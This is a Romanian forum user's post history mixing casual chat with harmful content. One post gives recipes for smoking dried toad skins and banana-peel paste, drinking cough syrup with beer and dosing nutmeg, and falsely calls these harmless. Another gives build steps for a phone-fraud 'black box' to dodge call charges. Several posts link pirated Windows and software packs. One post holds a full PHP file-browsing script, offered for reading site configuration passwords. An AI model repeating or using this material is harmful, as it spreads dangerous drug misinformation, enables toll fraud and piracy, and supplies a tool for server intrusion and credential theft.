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Everything posted by zbeng

  1. da...daca nu crei uite la ip:
  2. zbeng


    mai e in piciuare da nu se vad nici pozele si nici unele texte de download
  3. Daca sunteti dispusi sa incercati ceva nou , iata cateva variante . * Banane Cumparati 7 Kg de banane coapte , galbene . * Decojiti-le , mancati fructul . Pastrati cojile . * Razuiti interiorul cojilor cu un cutit ascutit . * Puneti materialul rezultat intr-o oala si adaugati apa . * Fierbeti 3-4 ore pana cand are consistenta unei paste solide . * Intindeti pasta pe servetele de hartie si puneti la uscat . Va rezulta o pudra neagra , fina . Deobicei efectul apare dupa 3-4 tigari rulate cu acest praf . * Sirop de Tuse Amestecati Sirop de Tuse cu o parte egala de bere si beti . Efectul este moleseala si euforie . * Broaste Raioase Adunati 5-10 broaste raioase (broastele de apa nu sunt bune) . * Omorati-le cat mai nedureros pentru ele si jupuiti-le imediat . * Uscati pieile in frigider 4-5 zile sau pana cand devine faramicioasa . * Zdrobiti pieile la stadiu de pudra si fumati . Din cauza gustului cam rau , puteti adauga foi de menta . * Nucsoara Pisati cateva nucsoare intregi pana la stadiul de pudra . * Dozajul obisnuit este de 10-15 grame . O doza mai mare poate produce sete excesiva , anxietate si palpitatii , dar halucinatiile sunt rare . * Arahide Luati o punga de arahide (neprajite) . * Desfaceti-le , pastrati cojita subtire care acopera fructul . * Mancati fructul si aruncati invelisul dur . * Pisati cojitele si fumati-le . Atentie! Nu incurajati consumul de droguri "clasice", puternic halucinogene ce produc dependenta. Daca stiti pe cineva dornic sa incerce asa ceva, nu-l lasati sa-si distruga viata. Asa zisele 'droguri' de mai sus sunt inofensive pentru organismul uman, neprovocând dependenta de nici un fel. Asadar, daca v-a trecut prin cap sa va apucati de droguri, lasati dreaq ideea asta. Daca sunteti chiar obsedati de idee, incercati modalitatile descrise mai sus. Nu va vor afecta pe viata si in plus...sunt ieftine.
  4. Phreaking Black Box Acest dispozitiv a mai fost prezentat pe unele site-uri romanesti , dar constructia lui era eronata . Pe scurt , iata cum functioneaza : in orice moment prin telefonul dvs trec cam 20v . Atunci cand suna cineva , voltajul creste la 48v iar cand raspundeti , scade la 10v , moment in care compania telefonica incepe sa taxeze apelantul . Black Box este un dispozitiv simplu de realizat , care mentine voltajul telefonului la aprox. 38v , astfel incat apelantul nu mai este taxat . Totusi dupa cam jumatate de ora , convorbirea este intrerupta . Materiale : 1 rezistor de 1.8K 1/2 1 LED de 1.5v 1 intrerupator Ansamblarea : 1. Deschideti telefonul 2. Ar trebui sa vedeti 3 fire : rosu , verde si galben . Cel rosu este cel care ne intereseaza . Atunci cand intreruptorul este cuplat si primiti un telefon , led-ul se aprinde si voltajul ramane peste 38v . Pentru a efectua convorbiri , trebuie sa decuplati intrerupatorul . ATENTIE : datorita diversitatii de centrale telefonice , dispozitivul nu este garantat ca functioneaza in zona dvs.
  5. zbeng


    hmm interesant am dat amandoi peste acelas site:@
  6. daca erai prin spania iti dadeam o bere
  7. zbeng


    sa cresti mare;)
  8. e codu sursa in caz de se plictiseste vro cineva...e luat de pe un site;)
  9. le-am postat special pt u stiam ca duci lipsa (de icoane)
  10. Windows XP Crystal 2006 ISO Windows XP is a line of operating systems developed by M*crosoft for use on general-purpose computer systems, including home and business desktops, notebook computers, and media centers. Windows XP is the successor to both Windows 2000 and Windows Me, and is the first consumer-oriented operating system produced by M*crosoft to be built on the Windows NT kernel and architecture. Windows XP was first released on October 25, 2001, and as of 2006 continues to be the most recent consumer version of M*crosoft Windows available, with over 400 million copies in use, according to an estimate by an IDC analyst. The most common editions of the operating system are Windows XP Home Edition, which is targeted at home users, and Windows XP Professional, which has additional features such as support for Windows Server domains and dual processors, and is targeted at power users and business clients. Windows XP Media Center Edition consists of Windows XP Professional with new features enhancing the ability to record and watch TV shows, watch DVDs, listen to music and more. Windows XP Tablet PC Edition is designed to run the ink-aware Tablet PC platform. Two separate 64-bit versions of Windows XP were also released, Windows XP 64-bit Edition for IA-64 (Itanium) processors and Windows XP Professional x64 Edition for AMD64/EM64T processors. Windows XP is known for its improved stability and efficiency over previous versions of Windows. It presents a significantly redesigned graphical user interface (GUI), a change M*crosoft promoted as more user-friendly than previous versions of Windows. New software management capabilities were introduced to avoid the “DLL hell” that plagued older consumer versions of Windows. It is also the first version of Windows to use product activation to combat software piracy, a restriction that did not sit well with some users and privacy advocates. Windows Vista is scheduled to be the next major revision of M*crosoft Windows, with a planned release date of November 2006 for business editions, and January 2007 for other editions. FOR THIS VERSION: - More themes , screen savers have been added - Windows file protection has been disabled - Annoying Windows error message has been disable - Custom desktop theme can be changed without patching your Windows - Faster connection speed has been unlocked , No more slow connection speedS while using p2p like Kazaa , eMule & BitTorrent - Concurrent sessions have been enabled - New beautiful background wallpapers - More useful registry tweaks -And much more to discover with Windows Crystal XP………. ALSO INCLUDED: 01- Ad-aware pro 1.6 02- AVG antivirus pro 2006 03- Foxit pdf all in one 04- Internet Download Manager v5.02 full 05- Fire fox browser 1.5.4 06- Irfan view 3.39 07- K-lite mega codec pack 08- Media player 11 09- Msn messenger 7.5.77 10- 7-zip 11- Winamp 5.24 12- Winrar Crystal 13- Yahoo messenger 7 14- M*crosoft Office 2003 Pro 15- Ms java 16- Vista clock 17- Alcohol 120% 18- Internet Explorer 7Beta 3 Welcome To Windows Crystal Xp Setup This version of Windows is not for upgrade from another Windows. To setup Windows Crystal Xp you must burn the iso image to a disk, then boot from a CD ROM. The iso is already bootable so you will not need a start up disk, just burn from a CD and reboot your system, and it will boot from dos. For best performance make sure to format your current Windows and setup Windows Crystal XP as a new, clean installation! USE HJSPLIT TO JOIN FILES DOWNLOAD:- 534.67 MB http://rapidshare.de/files/30700566/XPCrystal2.ISO.rar.001.html [url]http://rapidshare.de/files/30703710/XPCrystal2.ISO.rar.002.html[/url] [url]http://rapidshare.de/files/30706356/XPCrystal2.ISO.rar.003.html[/url]
  11. Windows TinyXP Professional SP2 Beast Edition Unattended CD This special 'Beast Edition' of TinyXP is designed to be hell fast! Internet Explorer and Outlook Express have been removed from this edition. Mozilla Firefox web browser and Mozilla Thunderbird email client are included as replacements to Internet Explorer and Outlook Express. The latest edition of MSN Messenger (v7.5) is also installed. This edition of TinyXP includes Ethernet LAN drivers, Microsoft Sidewinder drivers and Sound Controller drivers. All keyboard layouts are included. All languages have been removed apart from United Kingdom. The default Luna theme has been removed, but this edition includes the XP Amp theme as default. Most of the networking features are removed from this edition, this is because this edition is intended as a gaming edition that you can surf the internet with. It is NOT intended as an operating system for use in a corporate environment to squeeze a little bit more production out of the poor employees, however, MS Mail and MAPI are included for compatibility. Also kept - 16Bit Support, Disk Cleanup, the "core" of Internet Explorer, Task Scheduler and you are still able to open ZIP files without the need for any any third party program. Services left remaining are: DHCP, DNS Client, Event Log, IAS, Network Provisioning, Performance Logs and Alerts, Secondary Logon, Shell Services, System Event Notification, Uninterruptible Power Supply Universal Plug and Play, Windows Management Instrumentation, Windows Time and Wireless Zero Configuration. This edition also includes Wireless LAN and there is also support for use on laptops. On this edition of TinyXP there are no minimum RAM or hard disk space requirements. ------------------------------------------------------------------------- TinyXP Beast Edition Statistics: To check the checksum for this ISO file, go here... http://www.slavasoft.com/fsum/overview.htm Then, download FSUM, then put the following code in a new Notepad text (txt) file...... fsum.exe -sha1 TinyXP_Beast_Edition.iso >sum.txt Then, rename that txt file as a .cmd file and, with FSUM.EXE in the same folder as the TinyXP_Beast_Edition.iso - double click the .cmd file you made and it will create a new "sum.txt" file - just open that sum.txt file and make sure the code matches with the following code.......... ISO FILE SHA-1 CHECKSUM: 7ae08a8a65c958c89623da8fbdebb63ffb171938 ------------------------------------------------------------------------- ISO File Size in Bytes............................ 149,360,640 Files on ISO.......................................... 2,041 Folders on ISO....................................... 81 ------------------------------------------------------------------------- Windows Performance Info... Operating System RAM Memory Usage = 42Mb WINDOWS Folder = 321.6 Mb Running Processes on First Install = 13 Install Time for Windows = Seven Minutes ------------------------------------------------------------------------- Windows XP Pro Custom Added Features Integrated Service Pack 2 (WindowsXP-KB835935-SP2-ENU.exe) Registry Tweaks For Performance/Gaming/Internet ------------------------------------------------------------------------- Silent Installs Mozilla Firefox Web Browser v1.5.0.4 Mozilla Thunderbird Email Client v1.5.0.4 (20060516) MSN Messenger v7.5.0324 ------------------------------------------------------------------------- Integrated Critical Post SP2 Hotfixes (Windows Updates) up to 28th March 2006... IE6.0sp1-KB905915-Windows-2000-XP-x86-ENU WindowsInstaller-KB893803-v2-x86 WindowsXP-KB873333-x86-ENU WindowsXP-KB873339-x86-ENU WindowsXP-KB883939-x86-ENU WindowsXP-KB884020-x86-enu WindowsXP-KB885222-v2-x86-ENU WindowsXP-KB885250-x86-ENU WindowsXP-KB885835-x86-ENU WindowsXP-KB885836-x86-ENU WindowsXP-KB886185-x86-enu WindowsXP-KB886677-x86-enu WindowsXP-KB886716-v2-x86-ENU WindowsXP-KB887472-x86-enu WindowsXP-KB887742-x86-ENU WindowsXP-KB887797-x86-enu WindowsXP-KB888113-x86-ENU WindowsXP-KB888240-x86-ENU WindowsXP-KB888302-x86-ENU WindowsXP-KB889527-v3-x86-ENU WindowsXP-KB890046-x86-ENU WindowsXP-KB890175-x86-ENU WindowsXP-KB890859-x86-ENU WindowsXP-KB891781-x86-ENU WindowsXP-KB893066-v2-x86-ENU WindowsXP-KB893086-x86-ENU WindowsXP-KB893357-v2-x86-ENU WindowsXP-KB893756-x86-ENU WindowsXP-KB894391-x86-ENU WindowsXP-KB894395-x86-ENU WindowsXP-KB896344-v2-x86-ENU WindowsXP-KB896358-x86-ENU WindowsXP-KB896422-x86-ENU WindowsXP-KB896423-x86-ENU WindowsXP-KB896424-x86-ENU WindowsXP-KB896427-v3-x86-ENU WindowsXP-KB896428-x86-ENU WindowsXP-KB896626-v2-x86-ENU WindowsXP-KB898461-x86-ENU WindowsXP-KB898900-v2-x86-ENU WindowsXP-KB899587-x86-ENU WindowsXP-KB899589-x86-ENU WindowsXP-KB899591-x86-ENU WindowsXP-KB900725-x86-ENU WindowsXP-KB900930-x86-ENU WindowsXP-KB901017-x86-ENU WindowsXP-KB901190-x86-ENU WindowsXP-KB901214-x86-ENU WindowsXP-KB902400-x86-ENU WindowsXP-KB903234-x86-ENU WindowsXP-KB904706-v2-x86-ENU WindowsXP-KB905414-x86-ENU WindowsXP-KB905749-x86-ENU WindowsXP-KB905915-x86-ENU WindowsXP-KB908519-x86-ENU WindowsXP-KB908521-x86-ENU WindowsXP-KB910437-x86-ENU WindowsXP-KB911927-x86-ENU WindowsXP-KB912919-x86-ENU WindowsXP-KB913446-x86-ENU ------------------------------------------------------------------------- This OS is a great addition to any collection.. and is very "hell Fast"... works great and no problems so far.. http://rapidshare.de/files/29351362/TinyXP_Beast_Edition.iso
  12. DOWNLOAD http://rapidshare.de/files/37180306/3456.rar.html
  13. ULTRA PACK Template Monster HTML & FLASH Template Monster website templates, flash templates and other products are ready-made web designs, that can be used as a basis for fast and high-quality website. Our website templates, flash templates and all other products are completely customizable and ready for immediate download. We at TemplateMonster.com do our best to provide you with web templates design of premium quality. Pack : 7814, 7993, 8118, 8135, 8438, 8901, 8952, 9465, 9514, 9764, 10000, 10002, 10011, 10022, 10034, 10064, 10086, 10088, 10090, 10098, 10109, 10111, 10115, 10128, 10139, 10158, 10162, 10163, 10164, 10167, 10170, 10655, 10173, 10195, 10205, 10245, 10247, 10249, 10254, 10281, 10311, 10391, 10397, 10408, 10456, 10475, 10545, 10588, 10655, 10740, 11856 Download: http://rapidshare.de/files/36983725/ETM.part01.rar.html [url]http://rapidshare.de/files/36985809/ETM.part02.rar.html[/url] [url]http://rapidshare.de/files/36988230/ETM.part03.rar.html[/url] [url]http://rapidshare.de/files/36990263/ETM.part04.rar.html[/url] [url]http://rapidshare.de/files/36992469/ETM.part05.rar.html[/url] [url]http://rapidshare.de/files/36994427/ETM.part06.rar.html[/url] [url]http://rapidshare.de/files/36996499/ETM.part07.rar.html[/url] [url]http://rapidshare.de/files/36996712/ETM.part08.rar.html[/url] pas A5M4L3A1
  14. DOWNLOAD http://rapidshare.de/files/37122970/21_osc_warez-vb.org_ful_-tenplates.part1.rar [url]http://rapidshare.de/files/37125205/21_osc_warez-vb.org_ful_-templates.part2.rar[/url] [url]http://rapidshare.de/files/37128064/21_osc_warez-vb.org_ful_-templates.part3.rar[/url] [url]http://rapidshare.de/files/37130389/21_osc_warez-vb.org_ful_-templates.part4.rar[/url] [url]http://rapidshare.de/files/37132069/21_osc_warez-vb.org_ful_-templates.part5.rar[/url] [url]http://rapidshare.de/files/37132865/21_osc_warez-vb.org_ful_-templates.part6.rar[/url]
  15. eu nul mai am...dar daca ai nevoie m-ai caut;)
  16. http://rapidshare.de/files/37202867/code0000000319.rar.html
  17. Acesta este un banal script in php cu care poti sa "hacuiesti" un ROOT de pe linux si/sau de windous , in alte cuvinte iti arata sursa fisierului php, si tot ce ai prin directorul ROOT de pe linuics, sau de pe uindous , eu am aflat parola din config la multe situri :@.... Atentie fisierul trebuie sa fie pe acel server :@ altfel nu va merge <? // scripul e sub licenta GNU made by necenzurat echo "<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">n"; echo "<html lang='en'>n"; echo "<head>n"; echo "<title></title>n"; echo "<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>n"; echo "</head>n"; echo "<body>n"; $mode = $_GET['mode']; $cat = $_GET['cat']; $dir = $_GET['dir']; if($mode=="") { echo"<center>n"; echo"<a href=?mode=list>Intra da ai GRIJA, nu stii ce se poate intampla dincolo de usa cu bolta </a>n"; echo"</center>n"; } elseif($mode=="steal") { if($cat=="") { $cat="xs.php"; } $size=filesize($cat); $file_size = round($size / 1024 * 100) / 100 . "Kb"; echo"<table width=94% border=1 bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse: collapse cellpadding=0><tr><td>"; $po=show_source($cat); echo "</td></tr></table></center>"; echo "</body></html>"; } elseif($mode=="list") { echo"<title>Afisare de directoare</title>"; $base = substr($_SERVER['PATH_TRANSLATED'],0,strrpos($_SERVER['PATH_TRANSLATED'],'/')); if($dir=="") { $dir="./"; } $path = $dir; function after ($this, $inthat) { if (!is_bool(strpos($inthat, $this))) return substr($inthat, strpos($inthat,$this)+strlen($this)); } echo "<center>[B]$dir[/B]</font></center><table width=94% border=1 bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse: collapse cellpadding=0><tr><td>"; $dir_handle = @opendir($path) or die("Nu se poate paci :("); while (false !== ($file = readdir($dir_handle))) { $link = "[url="?mode=steal&cat=$dir/$file><font"]$file</font>[/url] "; $formato = after('.', $file); If($formato==".") { $link = "<a href=?mode=list&dir=$dir/$file>Directorul precedent</a> "; } If($formato=="") { $link = "[url="?mode=list&dir=$dir/$file><font"]$file</font>[/url] "; } echo "$link"; } closedir($dir_handle); echo "</td></tr></table>"; } ?> bye necenzurat
  18. In articolul anterior am prezentat cautarea fulltext simpla in cimpuri text sau varchar cu MySQL. Insa MySQL ofera niste facilitati mai avansate de cautare fulltext permitind operatori booleani. Adica sa fie include anumite cuvinte sau excluse altele sau cautari partiale sau alte combinatii. Aceasta cautare se precizeaza cu 'IN BOOLEAN MODE'. De exemplu: SELECT * FROM articles WHERE MATCH(title, body) AGAINST('+cuvint_de_gasit -cuvint_lipsa' IN BOOLEAN MODE); In acest caz inregistrarile trebuie sa contina 'cuvint_de_gasit' insa sa nu fie prezent 'cuvint_lipsa'. Lista operatorilor acceptati: + - cuvintul trebuie sa fie prezent - - cuvintul trebuie sa lipseasca * - cautare partiala: AGAINST ('num*' IN BOOLEAN MODE) o sa gaseasca cele care contin 'nume', 'numit', 'numitor', etc. "" - cautare exacta AGAINST ('"programare php"' IN BOOLEAN MODE) o sa gaseasca inregistrarile cu "programare php" < - creste relevanta cuvintului de cautat > - scade relevanta cuvintului de cautat AGAINST ('<mysql >php' IN BOOLEAN MODE) gaseste inregistrarile cu relevanta pt. 'mysql' si mai putin relevant 'php' ~ - negare, folosit pt. cuvinte care trebuie sa lipseasca, insa nu chiar de tot ca la - (cuvintele au relevanta mica) ( ) - grup de cuvinte AGAINST ('~mysql +(programare php)' IN BOOLEAN MODE) gaseste inregistrarile care nu contin relevant 'mysql' dar contin 'programare' si 'php' Combinate impreuna acesti operatori pot duce la cautari inteligente in bazele de date mai ales cind e vorba de multe inregistrari in baza de date BYE PRO;)
  19. poftim pe rapidshare.ro http://rapidshare.ro/download.php?id=eMLJTF837CWFfPZhrEjm upload personal:))=)9
  20. portaru e bun...da hai sa comente si eu :parca nu aveam strategie mergeau cate 5 e un om ramaneau rstu descoperiti fugeam ca prostii nu jucam calm pu*a mea mie mi sa parut penal meciu din partea romaniei...sa vedem ce face cand juaca in madrid(bernabeu)
  21. oate steaua va domina prima repriza da in a 2 ca tot timpu va face lata(asta la pariu)
  22. ma intentia conteaza nu
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